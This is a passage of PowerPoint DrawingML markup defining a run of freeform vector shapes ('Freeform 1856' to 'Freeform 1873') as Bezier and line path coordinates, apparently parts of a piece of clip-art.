                    <a:moveTo>
                      <a:pt x="75" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="8"/>
                      <a:pt x="43" y="0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1" y="90"/>
                      <a:pt x="41" y="90"/>
                      <a:pt x="41" y="90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2" y="81"/>
                      <a:pt x="75" y="80"/>
                      <a:pt x="77" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="68"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="75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0" name="Freeform 1856"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5328" y="-1006"/>
                <a:ext cx="187" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 80 h 90"/>
                  <a:gd name="T2" fmla="*/ 15 w 79"/>
                  <a:gd name="T3" fmla="*/ 63 h 90"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 90"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 27 h 90"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 8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90"/>
                  <a:gd name="T17" fmla="*/ 79 w 79"/>
                  <a:gd name="T18" fmla="*/ 90 h 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90">
                    <a:moveTo>
                      <a:pt x="66" y="80"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="90"/>
                      <a:pt x="30" y="82"/>
                      <a:pt x="15" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="44"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="48" y="8"/>
                      <a:pt x="63" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="46"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="66" y="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1" name="Freeform 1857"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5394" y="-928"/>
                <a:ext cx="52" cy="57"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 22"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 5 w 22"/>
                  <a:gd name="T3" fmla="*/ 17 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 22"/>
                  <a:gd name="T5" fmla="*/ 2 h 24"/>
                  <a:gd name="T6" fmla="*/ 18 w 22"/>
                  <a:gd name="T7" fmla="*/ 7 h 24"/>
                  <a:gd name="T8" fmla="*/ 18 w 22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24"/>
                  <a:gd name="T17" fmla="*/ 22 w 22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24">
                    <a:moveTo>
                      <a:pt x="18" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="24"/>
                      <a:pt x="9" y="22"/>
                      <a:pt x="5" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="11"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="4" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="14" y="2"/>
                      <a:pt x="18" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="12"/>
                      <a:pt x="22" y="19"/>
                      <a:pt x="18" y="2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2" name="Freeform 1858"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5411" y="-909"/>
                <a:ext cx="19" cy="19"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 8"/>
                  <a:gd name="T1" fmla="*/ 7 h 8"/>
                  <a:gd name="T2" fmla="*/ 2 w 8"/>
                  <a:gd name="T3" fmla="*/ 6 h 8"/>
                  <a:gd name="T4" fmla="*/ 2 w 8"/>
                  <a:gd name="T5" fmla="*/ 1 h 8"/>
                  <a:gd name="T6" fmla="*/ 6 w 8"/>
                  <a:gd name="T7" fmla="*/ 2 h 8"/>
                  <a:gd name="T8" fmla="*/ 7 w 8"/>
                  <a:gd name="T9" fmla="*/ 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8"/>
                  <a:gd name="T17" fmla="*/ 8 w 8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8">
                    <a:moveTo>
                      <a:pt x="7" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="3" y="7"/>
                      <a:pt x="2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8" y="4"/>
                      <a:pt x="8" y="6"/>
                      <a:pt x="7" y="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3" name="Freeform 1859"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5697" y="-1006"/>
                <a:ext cx="212" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 74 w 90"/>
                  <a:gd name="T1" fmla="*/ 25 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 6 h 90"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 6 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 15 h 90"/>
                  <a:gd name="T8" fmla="*/ 40 w 90"/>
                  <a:gd name="T9" fmla="*/ 90 h 90"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 82 h 90"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 82 h 90"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 78 h 90"/>
                  <a:gd name="T16" fmla="*/ 74 w 90"/>
                  <a:gd name="T17" fmla="*/ 25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90"/>
                  <a:gd name="T29" fmla="*/ 90 w 90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90">
                    <a:moveTo>
                      <a:pt x="74" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="8"/>
                      <a:pt x="42" y="0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0" y="90"/>
                      <a:pt x="40" y="90"/>
                      <a:pt x="40" y="90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72" y="81"/>
                      <a:pt x="74" y="80"/>
                      <a:pt x="77" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="68"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="74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4" name="Freeform 1860"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5654" y="-989"/>
                <a:ext cx="187" cy="212"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 80 h 90"/>
                  <a:gd name="T2" fmla="*/ 16 w 79"/>
                  <a:gd name="T3" fmla="*/ 63 h 90"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 90"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 27 h 90"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 8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90"/>
                  <a:gd name="T17" fmla="*/ 79 w 79"/>
                  <a:gd name="T18" fmla="*/ 90 h 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90">
                    <a:moveTo>
                      <a:pt x="66" y="80"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="90"/>
                      <a:pt x="30" y="82"/>
                      <a:pt x="16" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="44"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="49" y="8"/>
                      <a:pt x="63" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="66" y="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5" name="Freeform 1861"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5723" y="-911"/>
                <a:ext cx="49" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 21"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 4 w 21"/>
                  <a:gd name="T3" fmla="*/ 17 h 24"/>
                  <a:gd name="T4" fmla="*/ 3 w 21"/>
                  <a:gd name="T5" fmla="*/ 3 h 24"/>
                  <a:gd name="T6" fmla="*/ 17 w 21"/>
                  <a:gd name="T7" fmla="*/ 7 h 24"/>
                  <a:gd name="T8" fmla="*/ 18 w 21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24"/>
                  <a:gd name="T17" fmla="*/ 21 w 21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24">
                    <a:moveTo>
                      <a:pt x="18" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="24"/>
                      <a:pt x="8" y="22"/>
                      <a:pt x="4" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="3" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="13" y="2"/>
                      <a:pt x="17" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="12"/>
                      <a:pt x="21" y="19"/>
                      <a:pt x="18" y="2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6" name="Freeform 1862"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5739" y="-893"/>
                <a:ext cx="17" cy="19"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 7"/>
                  <a:gd name="T1" fmla="*/ 7 h 8"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 6 h 8"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
                  <a:gd name="T5" fmla="*/ 1 h 8"/>
                  <a:gd name="T6" fmla="*/ 6 w 7"/>
                  <a:gd name="T7" fmla="*/ 2 h 8"/>
                  <a:gd name="T8" fmla="*/ 6 w 7"/>
                  <a:gd name="T9" fmla="*/ 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8"/>
                  <a:gd name="T17" fmla="*/ 7 w 7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8">
                    <a:moveTo>
                      <a:pt x="6" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="3" y="8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6" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="4"/>
                      <a:pt x="7" y="6"/>
                      <a:pt x="6" y="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7" name="Freeform 1863"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5708" y="-963"/>
                <a:ext cx="57" cy="82"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 24"/>
                  <a:gd name="T1" fmla="*/ 4 h 35"/>
                  <a:gd name="T2" fmla="*/ 5 w 24"/>
                  <a:gd name="T3" fmla="*/ 33 h 35"/>
                  <a:gd name="T4" fmla="*/ 15 w 24"/>
                  <a:gd name="T5" fmla="*/ 34 h 35"/>
                  <a:gd name="T6" fmla="*/ 23 w 24"/>
                  <a:gd name="T7" fmla="*/ 30 h 35"/>
                  <a:gd name="T8" fmla="*/ 18 w 24"/>
                  <a:gd name="T9" fmla="*/ 0 h 35"/>
                  <a:gd name="T10" fmla="*/ 0 w 24"/>
                  <a:gd name="T11" fmla="*/ 4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35"/>
                  <a:gd name="T20" fmla="*/ 24 w 24"/>
                  <a:gd name="T21" fmla="*/ 35 h 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35">
                    <a:moveTo>
                      <a:pt x="0" y="4"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="33"/>
                      <a:pt x="5" y="33"/>
                      <a:pt x="5" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="34"/>
                      <a:pt x="9" y="35"/>
                      <a:pt x="15" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="33"/>
                      <a:pt x="24" y="31"/>
                      <a:pt x="23" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="0"/>
                      <a:pt x="18" y="0"/>
                      <a:pt x="18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8" name="Freeform 1864"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5685" y="-1027"/>
                <a:ext cx="78" cy="75"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 33"/>
                  <a:gd name="T1" fmla="*/ 5 h 32"/>
                  <a:gd name="T2" fmla="*/ 4 w 33"/>
                  <a:gd name="T3" fmla="*/ 29 h 32"/>
                  <a:gd name="T4" fmla="*/ 19 w 33"/>
                  <a:gd name="T5" fmla="*/ 30 h 32"/>
                  <a:gd name="T6" fmla="*/ 33 w 33"/>
                  <a:gd name="T7" fmla="*/ 24 h 32"/>
                  <a:gd name="T8" fmla="*/ 28 w 33"/>
                  <a:gd name="T9" fmla="*/ 0 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 w 33"/>
                  <a:gd name="T11" fmla="*/ 5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3"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 33 w 33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3" h="32">
                    <a:moveTo>
                      <a:pt x="0" y="5"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="29"/>
                      <a:pt x="4" y="29"/>
                      <a:pt x="4" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="11" y="32"/>
                      <a:pt x="19" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="29"/>
                      <a:pt x="33" y="26"/>
                      <a:pt x="33" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="28" y="0"/>
                      <a:pt x="28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9" name="Freeform 1865"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5569" y="-970"/>
                <a:ext cx="213" cy="210"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 75 w 90"/>
                  <a:gd name="T1" fmla="*/ 24 h 89"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 5 h 89"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 89"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 14 h 89"/>
                  <a:gd name="T8" fmla="*/ 41 w 90"/>
                  <a:gd name="T9" fmla="*/ 89 h 89"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 81 h 89"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 81 h 89"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 77 h 89"/>
                  <a:gd name="T16" fmla="*/ 75 w 90"/>
                  <a:gd name="T17" fmla="*/ 24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89"/>
                  <a:gd name="T29" fmla="*/ 90 w 90"/>
                  <a:gd name="T30" fmla="*/ 89 h 8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89">
                    <a:moveTo>
                      <a:pt x="75" y="24"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="7"/>
                      <a:pt x="43" y="0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1" y="89"/>
                      <a:pt x="41" y="89"/>
                      <a:pt x="41" y="89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2" y="80"/>
                      <a:pt x="75" y="79"/>
                      <a:pt x="77" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="67"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="75" y="2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0" name="Freeform 1866"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5529" y="-954"/>
                <a:ext cx="187" cy="210"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 79 h 89"/>
                  <a:gd name="T2" fmla="*/ 15 w 79"/>
                  <a:gd name="T3" fmla="*/ 62 h 89"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 89"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 26 h 89"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 7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89"/>
                  <a:gd name="T17" fmla="*/ 79 w 79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89">
                    <a:moveTo>
                      <a:pt x="66" y="79"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="89"/>
                      <a:pt x="30" y="82"/>
                      <a:pt x="15" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="43"/>
                      <a:pt x="0" y="19"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="48" y="7"/>
                      <a:pt x="63" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="46"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="66" y="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1" name="Freeform 1867"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5595" y="-878"/>
                <a:ext cx="52" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 22"/>
                  <a:gd name="T1" fmla="*/ 22 h 25"/>
                  <a:gd name="T2" fmla="*/ 5 w 22"/>
                  <a:gd name="T3" fmla="*/ 17 h 25"/>
                  <a:gd name="T4" fmla="*/ 4 w 22"/>
                  <a:gd name="T5" fmla="*/ 3 h 25"/>
                  <a:gd name="T6" fmla="*/ 18 w 22"/>
                  <a:gd name="T7" fmla="*/ 7 h 25"/>
                  <a:gd name="T8" fmla="*/ 18 w 22"/>
                  <a:gd name="T9" fmla="*/ 2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25"/>
                  <a:gd name="T17" fmla="*/ 22 w 22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25">
                    <a:moveTo>
                      <a:pt x="18" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="25"/>
                      <a:pt x="9" y="22"/>
                      <a:pt x="5" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="12"/>
                      <a:pt x="0" y="6"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="14" y="2"/>
                      <a:pt x="18" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="13"/>
                      <a:pt x="22" y="19"/>
                      <a:pt x="18" y="2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2" name="Freeform 1868"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5612" y="-859"/>
                <a:ext cx="18" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 8"/>
                  <a:gd name="T1" fmla="*/ 8 h 9"/>
                  <a:gd name="T2" fmla="*/ 2 w 8"/>
                  <a:gd name="T3" fmla="*/ 6 h 9"/>
                  <a:gd name="T4" fmla="*/ 2 w 8"/>
                  <a:gd name="T5" fmla="*/ 1 h 9"/>
                  <a:gd name="T6" fmla="*/ 6 w 8"/>
                  <a:gd name="T7" fmla="*/ 3 h 9"/>
                  <a:gd name="T8" fmla="*/ 7 w 8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9"/>
                  <a:gd name="T17" fmla="*/ 8 w 8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9">
                    <a:moveTo>
                      <a:pt x="7" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="9"/>
                      <a:pt x="3" y="8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8" y="4"/>
                      <a:pt x="8" y="7"/>
                      <a:pt x="7" y="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3" name="Freeform 1869"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5510" y="-1275"/>
                <a:ext cx="333" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 333"/>
                  <a:gd name="T1" fmla="*/ 238 h 295"/>
                  <a:gd name="T2" fmla="*/ 210 w 333"/>
                  <a:gd name="T3" fmla="*/ 295 h 295"/>
                  <a:gd name="T4" fmla="*/ 333 w 333"/>
                  <a:gd name="T5" fmla="*/ 82 h 295"/>
                  <a:gd name="T6" fmla="*/ 24 w 333"/>
                  <a:gd name="T7" fmla="*/ 0 h 295"/>
                  <a:gd name="T8" fmla="*/ 0 w 333"/>
                  <a:gd name="T9" fmla="*/ 238 h 2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3"/>
                  <a:gd name="T16" fmla="*/ 0 h 295"/>
                  <a:gd name="T17" fmla="*/ 333 w 333"/>
                  <a:gd name="T18" fmla="*/ 295 h 2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3" h="295">
                    <a:moveTo>
                      <a:pt x="0" y="238"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="210" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23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4" name="Freeform 1870"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5720" y="-1207"/>
                <a:ext cx="170" cy="227"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 170"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 40 w 170"/>
                  <a:gd name="T3" fmla="*/ 215 h 227"/>
                  <a:gd name="T4" fmla="*/ 170 w 170"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 123 w 170"/>
                  <a:gd name="T7" fmla="*/ 14 h 227"/>
                  <a:gd name="T8" fmla="*/ 0 w 170"/>
                  <a:gd name="T9" fmla="*/ 225 h 227"/>
                  <a:gd name="T10" fmla="*/ 0 w 170"/>
                  <a:gd name="T11" fmla="*/ 227 h 2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0"/>
                  <a:gd name="T19" fmla="*/ 0 h 227"/>
                  <a:gd name="T20" fmla="*/ 170 w 170"/>
                  <a:gd name="T21" fmla="*/ 227 h 2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0" h="227">
                    <a:moveTo>
                      <a:pt x="0" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="40" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22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5" name="Freeform 1871"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5720" y="-1207"/>
                <a:ext cx="170" cy="227"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 170"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 40 w 170"/>
                  <a:gd name="T3" fmla="*/ 215 h 227"/>
                  <a:gd name="T4" fmla="*/ 170 w 170"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 123 w 170"/>
                  <a:gd name="T7" fmla="*/ 14 h 227"/>
                  <a:gd name="T8" fmla="*/ 0 w 170"/>
                  <a:gd name="T9" fmla="*/ 225 h 2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0"/>
                  <a:gd name="T16" fmla="*/ 0 h 227"/>
                  <a:gd name="T17" fmla="*/ 170 w 170"/>
                  <a:gd name="T18" fmla="*/ 227 h 2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0" h="227">
                    <a:moveTo>
                      <a:pt x="0" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="40" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="225"/>
                    </a:lnTo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6" name="Freeform 1872"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8262" y="-453"/>
                <a:ext cx="158" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 54 w 67"/>
                  <a:gd name="T1" fmla="*/ 21 h 73"/>
                  <a:gd name="T2" fmla="*/ 15 w 67"/>
                  <a:gd name="T3" fmla="*/ 4 h 73"/>
                  <a:gd name="T4" fmla="*/ 15 w 67"/>
                  <a:gd name="T5" fmla="*/ 4 h 73"/>
                  <a:gd name="T6" fmla="*/ 4 w 67"/>
                  <a:gd name="T7" fmla="*/ 7 h 73"/>
                  <a:gd name="T8" fmla="*/ 6 w 67"/>
                  <a:gd name="T9" fmla="*/ 12 h 73"/>
                  <a:gd name="T10" fmla="*/ 13 w 67"/>
                  <a:gd name="T11" fmla="*/ 52 h 73"/>
                  <a:gd name="T12" fmla="*/ 32 w 67"/>
                  <a:gd name="T13" fmla="*/ 67 h 73"/>
                  <a:gd name="T14" fmla="*/ 35 w 67"/>
                  <a:gd name="T15" fmla="*/ 73 h 73"/>
                  <a:gd name="T16" fmla="*/ 49 w 67"/>
                  <a:gd name="T17" fmla="*/ 69 h 73"/>
                  <a:gd name="T18" fmla="*/ 49 w 67"/>
                  <a:gd name="T19" fmla="*/ 69 h 73"/>
                  <a:gd name="T20" fmla="*/ 56 w 67"/>
                  <a:gd name="T21" fmla="*/ 66 h 73"/>
                  <a:gd name="T22" fmla="*/ 54 w 67"/>
                  <a:gd name="T23" fmla="*/ 21 h 7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7"/>
                  <a:gd name="T37" fmla="*/ 0 h 73"/>
                  <a:gd name="T38" fmla="*/ 67 w 67"/>
                  <a:gd name="T39" fmla="*/ 73 h 7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7" h="73">
                    <a:moveTo>
                      <a:pt x="54" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="6"/>
                      <a:pt x="26" y="0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0" y="22"/>
                      <a:pt x="3" y="38"/>
                      <a:pt x="13" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="59"/>
                      <a:pt x="25" y="64"/>
                      <a:pt x="32" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="73"/>
                      <a:pt x="35" y="73"/>
                      <a:pt x="35" y="73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52" y="69"/>
                      <a:pt x="54" y="68"/>
                      <a:pt x="56" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="58"/>
                      <a:pt x="66" y="37"/>
                      <a:pt x="54" y="21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7" name="Freeform 1873"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8226" y="-448"/>
                <a:ext cx="161" cy="179"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
